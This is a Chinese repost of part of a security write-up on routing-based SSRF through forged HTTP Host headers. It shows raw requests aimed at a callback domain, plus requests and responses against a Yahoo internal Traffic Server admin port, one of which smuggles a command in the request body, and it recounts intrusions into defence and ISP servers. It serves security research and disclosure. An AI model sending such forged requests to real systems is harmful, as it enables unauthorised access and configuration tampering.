IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

针对HTTP的隐藏攻击面分析(中)

发布时间:2017-08-16 13:53文章来源:互联网文章作者: 佚名点击次数:
为了增强用户体验度,现代Web网站架构中都包含了各种各样的隐藏系统,这些系统不仅可以给用户提供各种额外的服务,而且还可以帮助管理员提取网站各方面的分析数据。但是,这些隐藏系统同样也是近些年里经常被人们忽略的隐形攻击面。 在本系列文章的上集,我

为了增强用户体验度,现代Web网站架构中都包含了各种各样的“隐藏系统”,这些系统不仅可以给用户提供各种额外的服务,而且还可以帮助管理员提取网站各方面的分析数据。但是,这些隐藏系统同样也是近些年里经常被人们忽略的隐形攻击面。

在本系列文章的上集,我们对现代Web应用架构中的隐藏系统以及隐藏服务进行了简单描述,并且介绍了本系列文章中所要使用的工具以及技术。接下来,我们将用实际的例子来给大家进行详细的介绍。

三、请求误传

1.无效主机

触发一次回调最简单的方法就是发送一个错误的HTTP Host头:

GET / HTTP/1.1

Host: uniqid.burpcollaborator.net

Connection: close

虽然这项技术大家很多年前就已经知道了,但是这种技术真正的能力却被人们大大低估了-我用这项技术成功入侵了二十七台美国国防部、我的互联网服务提供商、以及某哥伦比亚ISP的服务器。为了让大家更清楚地了解这种漏洞的严重程度,我们先看看下面这台雅虎的内部服务器(存在漏洞,域名为http://ats-vm.lorax.bf1.yahoo.com/)。

乍看之下,我们貌似看不出服务器运行了哪些软件:

GET / HTTP/1.1

Host: XX.X.XXX.XX:8082

HTTP/1.1 200 Connection Established

Date: Tue, 07 Feb 2017 16:32:50 GMT

Transfer-Encoding: chunked

Connection: close

Ok

/ HTTP/1.1 is unavailable

Ok

Unknown Command

Ok

Unknown Command

Ok

Unknown Command

Ok

但是在不到一分钟之后,我不仅弄清楚了服务器运行了哪些软件,而且我还知道怎么去跟它进行通信,这一切多亏了‘HELP’命令:

HELP / HTTP/1.1

Host: XX.X.XXX.XX:8082

HTTP/1.1 200 Connection Established

Date: Tue, 07 Feb 2017 16:33:59 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Ok

Traffic Server Overseer Port

commands:

get

set = ""

help

exit

example:

Ok

get proxy.node.cache.contents.bytes_free

proxy.node.cache.contents.bytes_free = "56616048"

Ok

Variable lists are conf/yts/stats records, separated by commas

Ok

Unknown Command

Ok

Unknown Command

Ok

Unknown Command

Ok

服务器端所返回的每一行“Unknown Command”都会将请求中的每一行信息解析成单独的命令,因为它使用了一种换行符终止协议,所以我们无法通过传统的SSRF来利用这个漏洞。不过幸运的是,基于路由的SSRF灵活性更高,所以我可以采用GET请求来发送包含了任意命令的POST-style主体:

GET / HTTP/1.1

Host: XX.X.XXX.XX:8082

Content-Length: 34

GET proxy.config.alarm_email

HTTP/1.1 200 Connection Established

Date: Tue, 07 Feb 2017 16:57:02 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Ok

/ HTTP/1.1 is unavailable

Ok

Unknown Command

Ok

proxy.config.alarm_email = nobody@yahoo-inc.com

在‘SET’命令的帮助下,我可以随意修改雅虎负载均衡池中的配置,包括启用SOCKS代理并提升我IP地址的权限(可向他们的缓存池中推送数据)。我发现这个安全问题之后便立刻将其上报给了雅虎,我的努力也让我收获了一万五千美刀的漏洞奖金。就在几周之后,我又用同样的方法发现了另一台包含相同漏洞的服务器,然后又拿到了额外的五千美刀奖金...
针对HTTP的隐藏攻击面分析(中)
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/diannao/wangluo/1045664.html

标签分类:

上一篇:上一篇:数据泄露?大部分USB设备易遭“串扰泄露”攻击
下一篇: 下一篇:没有了
无觅关联推荐,快速提升流量